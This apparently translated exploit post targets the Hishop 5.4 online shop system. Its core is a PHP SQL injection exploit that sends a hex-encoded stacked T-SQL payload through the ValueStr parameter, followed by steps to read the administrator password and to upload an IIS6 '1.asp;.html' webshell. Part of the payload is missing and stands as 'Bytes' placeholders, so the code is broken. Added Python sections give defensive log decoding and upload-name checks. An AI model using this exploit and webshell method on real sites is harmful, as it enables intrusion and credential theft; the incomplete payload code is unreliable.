Hishop Online Shop System V5.4 (official release) is a B2C online shopping mall system developed independently by Hao Network on a B/S (browser/server) web application architecture. It aims to give enterprises and large and medium-sized online merchants the best protection and to meet customers' current and future needs for an independent online shop. The system runs on Microsoft's .NET platform and is built in layers on ASP.NET 2.0. With more than 0.3 million users over 9 years of wide deployment and testing in complex environments, the system has a good reputation for security, stability and ease of use. The V5.4 official release adds many practical functions, such as group buying and time-limited flash sales, on top of the 5.3 official release; features are fully optimized and the system is upgraded.
No Hishop exploit has come out since 5.1 and 5.1.3.
I found an injection point some time ago, but the statement is a bit complicated and the underscore is also filtered (the table names contain underscores), so the payload has to be specially constructed. Combined with IIS6, this injection point can be used to get a shell.
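The payload shape the page describes (a comment-breaking quote, then DECLARE @S NVARCHAR ... CAST(...) ... EXEC(@S) carrying the statement as hex-encoded UTF-16LE so that filtered characters such as the underscore never appear literally) is easy to recognise once the query string is URL-decoded. The following added example, which is my own code and not part of the original post or the Hishop product, does two things a defender wants: it checks ValueStr against the format the example URL suggests (I assume two integers joined by an underscore, as in 35_0), and it decodes the hex body of any CAST(0x... AS NVARCHAR) it finds so the hidden T-SQL can be read in a log review. The sample query strings are constructed for the example; the hex body in the second one is harmless demo text, not the page's payload.

```python
import re
from urllib.parse import unquote


def utf16le_hex(text: str) -> str:
    """Hex of the UTF-16LE encoding of text, the form a CAST(0x... AS NVARCHAR) payload carries."""
    return text.encode("utf-16-le").hex().upper()


# Constructed sample query strings (not taken from any real log). The second is shaped like
# the page's payload, but its hex body is our own harmless text, not the original statement.
SAMPLE_QUERIES = [
    "ValueStr=35_0",
    "ValueStr=35_0%27)%20or%201=1;DECLARE%20@S%20NVARCHAR(4000)%20SET%20@S=CAST(0x"
    + utf16le_hex("SELECT 1 -- constructed demo")
    + "%20AS%20NVARCHAR(4000))%20EXEC(@S);--",
]

# Assumption: ValueStr is meant to carry two integers joined by an underscore (as in 35_0).
VALUESTR_FORMAT = re.compile(r"\d+_\d+")
# Standard T-SQL form for smuggling a statement as hex: CAST(0x<hex> AS NVARCHAR(n)).
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+NVARCHAR", re.IGNORECASE)
SQL_MARKERS = ("DECLARE @", "NVARCHAR(", "EXEC(", "EXEC (")


def decode_hex_payload(hex_body: str) -> str:
    """Decode the hex body of CAST(0x... AS NVARCHAR) back to the T-SQL text it hides."""
    return bytes.fromhex(hex_body).decode("utf-16-le", errors="replace")


def inspect_query(query: str) -> dict:
    """Validate ValueStr against its expected format and flag obfuscated T-SQL in the query."""
    decoded = unquote(query)
    params = dict(p.split("=", 1) for p in decoded.split("&") if "=" in p)
    value = params.get("ValueStr", "")
    verdict = {
        "valid": VALUESTR_FORMAT.fullmatch(value) is not None,
        "suspicious": any(marker in decoded.upper() for marker in SQL_MARKERS),
        "decoded_payload": None,
    }
    match = HEX_CAST.search(decoded)
    if match:
        verdict["suspicious"] = True
        verdict["decoded_payload"] = decode_hex_payload(match.group(1))
    return verdict


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(q[:60], "->", inspect_query(q))
```

The strict format check is the real fix (a value that is not `digits_digits` should never reach the query); the marker and hex decoding are for reviewing IIS logs after the fact, where the literal SQL keywords are hidden behind the hex body and only the DECLARE/CAST/EXEC scaffolding is visible.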
Choose a URL of this type (see the example in the usage text below).
------------------------------- Start of EXP code -----------------------------------
<?php
print_r('
+-------------------------+
Hishop 5.4 & 5.4.1 SQL injection exploit   Date: 2011.6.9
+-------------------------+
');
if ($argc < 5) {  // host, port, path and registered mail are all required
    print_r('
+-------------------------+
Usage:   php ' . $argv[0] . ' Host Port Path RegMail
Example:
         php ' . $argv[0] . ' localhost 80 /SHOES/category-92.aspx?ValueStr=35_0 syc@myclover.org
+-------------------------+
');
    exit;
}
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mail = $argv[4];
// Encode the registered e-mail address as UTF-16LE hex (each byte followed by 00),
// the form the NVARCHAR payload below expects.
$expdata = "";
for ($i = 0; $i < strlen($mail); $i++)
    $expdata = $expdata . dechex(ord($mail[$i])) . "00";
$expdata = strtoupper($expdata);
// The hex body of the CAST(...) statement is missing from the source (only "Bytes"
// placeholders survive); it is left as it appears rather than reconstructed.
$expdata = "%27)%20or%201=1;DECLARE%20@S%20NVARCHAR(4000)%20SET%20@S=CAST(" .
    "Bytes Bytes Bytes Bytes Bytes Bytes" .
    "45006D00610069006C003D002700" . $expdata . "2700%20AS%20NVARCHAR(4000))%20EXEC(@S);--";
GET($host, $port, $path, $expdata, 30);

function GET($host, $port, $path, $data, $timeout, $cookie = "") {
    $fp = fsockopen($host, $port, $errno, $errstr, $timeout);
    if (!$fp) {
        echo "{$errstr} ({$errno})<br/>";
        exit;
    }
    // Raw HTTP/1.1 request; the payload is appended straight onto the query string.
    $out  = "GET $path$data HTTP/1.1\r\n";
    $out .= "Host: $host:$port\r\n";
    $out .= "Connection: CLOSE\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        fgets($fp, 128);
    }
    fclose($fp);
}
print_r('
+-------------------------+
[+] Get Manager Password
[1] Go to [Login] -> [My Account] -> [Personal Information]
[2] The e-mail field now contains the administrator password.
[3] Good luck!
+-------------------------+
[+] Get WebShell (IIS6)
[1] Log on to the back end /admin/, [Product Management] -> [Category Template Settings]
[2] Upload 1.asp;.html
[3] Shell address: http://www.bkjia.com/Themes/default/zh-cn/categorythemes/1.asp;.html
+-------------------------+
');
?>
Fix suggested by www.2cto.com: strengthen input filtering. I have been wondering whether to upgrade to Win2008 recently; IIS7 is reliable.
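The WebShell step relies on IIS6 treating a name like `1.asp;.html` as `1.asp`, so an upload check that only looks at the final extension passes it. The following added example, my own code rather than anything from the post or from Hishop, shows the server-side check a template upload should apply: a directory-free name made of one safe run of characters and exactly one dot, no script extension anywhere in the name, an allowlist of template extensions (the `.html`/`.htm`/`.css` set is an assumption for this example), and a server-chosen storage name so the attacker never controls the filename that IIS serves.

```python
import os
import re
from typing import Optional

# Assumed allowlist for a category template upload; adjust to what the feature really needs.
ALLOWED_EXTENSIONS = {".html", ".htm", ".css"}
# Extensions IIS 6 hands to a script engine; none may appear anywhere in the name.
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".asa", ".cer", ".cdx", ".ashx", ".asmx"}
# One run of safe characters, exactly one dot, so ';', spaces, '..' and double extensions fail.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}")


def is_safe_upload_name(filename: str) -> bool:
    """True only for a bare, single-extension, non-script name with an allowed extension."""
    # Reject anything carrying a directory component (either separator style).
    if os.path.basename(filename.replace("\\", "/")) != filename:
        return False
    if SAFE_NAME.fullmatch(filename) is None:
        return False
    # Defence in depth: check every dot- or semicolon-delimited piece, not just the last,
    # so "1.asp;.html" and "x.html.asp" are refused even if the regex above were loosened.
    pieces = re.split(r"[.;]", filename.lower())
    if any("." + piece in SCRIPT_EXTENSIONS for piece in pieces[1:]):
        return False
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXTENSIONS


def server_side_name(filename: str, token: str) -> Optional[str]:
    """Store under a server-chosen token (e.g. a random id), keeping only the vetted extension."""
    if not is_safe_upload_name(filename):
        return None
    return token + os.path.splitext(filename)[1].lower()


if __name__ == "__main__":
    # Constructed names for the demonstration.
    for name in ("template.html", "1.asp;.html", "shell.asp", "x.html.asp", "../x.html"):
        print(name, "->", server_side_name(name, "upload-0001"))
```

The single-dot rule does most of the work: it removes the semicolon trick and the double-extension trick in one check, and the extension loop only exists so that a later relaxation of the pattern does not silently reopen them.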